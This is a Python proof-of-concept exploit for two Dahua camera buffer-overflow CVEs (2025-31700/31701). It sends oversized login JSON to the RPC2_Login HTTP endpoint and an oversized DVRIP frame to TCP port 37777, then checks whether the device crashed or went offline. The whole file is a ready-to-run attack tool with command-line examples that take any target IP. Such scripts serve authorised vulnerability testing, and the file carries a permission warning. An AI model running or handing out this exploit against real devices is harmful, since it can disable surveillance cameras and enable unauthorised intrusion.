#!/usr/bin/env python3 """ dahua_rce.py CVE-2025-31700 / CVE-2025-31701 Buffer Overflow PoC ==================================================================== CVE-2025-31700 CVSS : 8.1 HIGH CWE : CWE-120 (Buffer Copy Without Checking Size of Input) Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31700 Vendor: https://dahuasecurity.com/aboutUs/trustedCenter/details/775 CVE-2025-31701 CVSS : 8.1 HIGH CWE : CWE-120 Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31701 Vendor: same advisory as CVE-2025-31700 Technical details ----------------- Both CVEs are stack/heap buffer overflows triggered by specially crafted inbound packets. On devices without ASLR/stack canaries, a crash or controlled RCE is possible. With ASLR the most likely outcome is a DoS (device restart or reboot). This script: 1. Probes the HTTP RPC2 endpoint with an oversized JSON body. 2. Probes the Dahua binary protocol on TCP/37777 with an oversized frame. 3. Monitors for a crash (connection reset, timeout, 5xx) which confirms the device is vulnerable. WARNING - This test intentionally sends malformed data and *may crash the target device*. Only run against devices you own or have written permission to test. """ import argparse import socket import struct import sys import time import requests requests.packages.urllib3.disable_warnings() # --------------------------------------------------------------------------- # Constants # --------------------------------------------------------------------------- TCP_PROTOCOL_PORT = 37777 # Dahua binary/DVRIP protocol HTTP_OVERFLOW_SZ = 8192 # bytes far exceeds any legitimate field length TCP_OVERFLOW_SZ = 65535 # bytes for raw binary frame body # --------------------------------------------------------------------------- # HTTP / RPC2 overflow probe (CVE-2025-31700) # --------------------------------------------------------------------------- def http_overflow_probe(target, port=80, timeout=8): """ Send an over-length RPC2 JSON body to trigger the HTTP-layer buffer overflow described in CVE-2025-31700. Returns a result dict: { "status": , "bytes": , "crashed": } """ garbage = "A" * HTTP_OVERFLOW_SZ payload = { "method": "global.login", "params": { "userName": garbage, "password": garbage, "clientType": garbage, "authorityType": "Default", "passwordType": "Default" }, "id": 1 } try: r = requests.post( f"http://{target}:{port}/RPC2_Login", json=payload, timeout=timeout, verify=False ) crashed = r.status_code >= 500 return {"status": r.status_code, "bytes": len(r.content), "crashed": crashed} except requests.exceptions.ConnectionError as e: if "reset" in str(e).lower() or "refused" in str(e).lower(): return {"status": "CONNECTION_RESET", "bytes": 0, "crashed": True} return {"status": f"CONN_ERROR: {e}", "bytes": 0, "crashed": False} except requests.exceptions.Timeout: return {"status": "TIMEOUT", "bytes": 0, "crashed": True} except Exception as e: return {"status": str(e), "bytes": 0, "crashed": False} # --------------------------------------------------------------------------- # TCP binary protocol overflow probe (CVE-2025-31701) # --------------------------------------------------------------------------- def build_dvrip_frame(body): """ Minimal DVRIP / Dahua binary protocol frame. Frame layout (big-endian): 0xFFD1 version magic 0x0000 session (0 = unauthenticated) 0x0000 sequence 0x0000 channel body length """ magic = struct.pack(">H", 0xFFD1) session = struct.pack(">H", 0x0000) seq = struct.pack(">H", 0x0000) channel = struct.pack(">H", 0x0000) length = struct.pack(">I", len(body)) return magic + session + seq + channel + length + body def tcp_overflow_probe(target, tcp_port=TCP_PROTOCOL_PORT, timeout=8): """ Send an oversized DVRIP frame to TCP/37777 to trigger the binary-protocol layer overflow described in CVE-2025-31701. Returns { "status": , "bytes": , "crashed": } """ try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) s.connect((target, tcp_port)) except ConnectionRefusedError: return {"status": "PORT_CLOSED", "bytes": 0, "crashed": False} except socket.timeout: return {"status": "CONNECT_TIMEOUT", "bytes": 0, "crashed": False} except Exception as e: return {"status": str(e), "bytes": 0, "crashed": False} body = b"B" * TCP_OVERFLOW_SZ frame = build_dvrip_frame(body) try: s.sendall(frame) try: resp = s.recv(1024) s.close() return {"status": "RESPONDED", "bytes": len(resp), "crashed": False} except socket.timeout: s.close() return {"status": "TIMEOUT_AFTER_SEND", "bytes": 0, "crashed": True} except BrokenPipeError: return {"status": "BROKEN_PIPE (reset by peer)", "bytes": 0, "crashed": True} except Exception as e: return {"status": str(e), "bytes": 0, "crashed": True} finally: try: s.close() except Exception: pass # --------------------------------------------------------------------------- # Reachability check # --------------------------------------------------------------------------- def check_alive(target, port=80, timeout=5): """Return True if the device responds to a basic HTTP request.""" try: requests.get(f"http://{target}:{port}/", timeout=timeout, verify=False) return True except Exception: return False # --------------------------------------------------------------------------- # Main exploit flow # --------------------------------------------------------------------------- def run(target, port=80, tcp_port=TCP_PROTOCOL_PORT, timeout=8, cve="both"): print(f""" ================================================= Dahua Buffer Overflow CVE-2025-31700/31701 WARNING: may crash the target device (DoS) ================================================= Target : {target} HTTP : :{port} TCP/DVRIP: :{tcp_port} Mode : {cve} """) alive_before = check_alive(target, port, timeout) print(f"[*] Device reachable before probe: {'YES' if alive_before else 'NO'}") if not alive_before: print("[-] Device not responding aborting") sys.exit(1) http_result = {"status": "SKIPPED", "bytes": 0, "crashed": False} tcp_result = {"status": "SKIPPED", "bytes": 0, "crashed": False} if cve in ("http", "both", "2025-31700"): print("\n[*] Sending HTTP RPC2 overflow (CVE-2025-31700) ...") http_result = http_overflow_probe(target, port, timeout) print(f" status : {http_result['status']}") print(f" bytes : {http_result['bytes']}") print(f" crashed : {http_result['crashed']}") if cve in ("tcp", "both", "2025-31701"): print("\n[*] Sending TCP/DVRIP overflow (CVE-2025-31701) ...") tcp_result = tcp_overflow_probe(target, tcp_port, timeout) print(f" status : {tcp_result['status']}") print(f" bytes : {tcp_result['bytes']}") print(f" crashed : {tcp_result['crashed']}") time.sleep(3) alive_after = check_alive(target, port, timeout) print(f"\n[*] Device reachable after probe : {'YES' if alive_after else 'NO'}") print("\n" + "=" * 51) print("RESULT") print("=" * 51) crashed = http_result["crashed"] or tcp_result["crashed"] if not alive_after: print(" [!!!] Device OFFLINE after payload DoS confirmed") print(" Likely VULNERABLE to CVE-2025-31700 / CVE-2025-31701") elif crashed: print(" [!!!] Crash indicators observed during probe") print(" Likely VULNERABLE (verify by checking device logs/reboot)") else: print(" [-] No crash observed possibly patched or different firmware") print(" Note: absence of crash does not guarantee patch; test on all ports") if alive_after and crashed: print("\n [+] Device recovered ASLR or watchdog may have restarted the service") print(" [+] Consistent with a real overflow contained by ASLR") def main(): parser = argparse.ArgumentParser( description="Dahua CVE-2025-31700/01 Buffer Overflow DoS PoC", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python dahua_rce.py 192.168.1.100 python dahua_rce.py 192.168.1.100 -p 8080 --tcp-port 37777 python dahua_rce.py 192.168.1.100 --cve http python dahua_rce.py 192.168.1.100 --cve tcp """ ) parser.add_argument("target", help="Camera IP or hostname") parser.add_argument("-p", "--port", type=int, default=80, help="HTTP port (default: 80)") parser.add_argument("--tcp-port", type=int, default=TCP_PROTOCOL_PORT, help=f"Dahua binary protocol port (default: {TCP_PROTOCOL_PORT})") parser.add_argument("--cve", choices=["both", "http", "tcp", "2025-31700", "2025-31701"], default="both", help="Which overflow to test (default: both)") parser.add_argument("--timeout", type=int, default=8) args = parser.parse_args() run(args.target, args.port, args.tcp_port, args.timeout, args.cve) if __name__ == "__main__": main()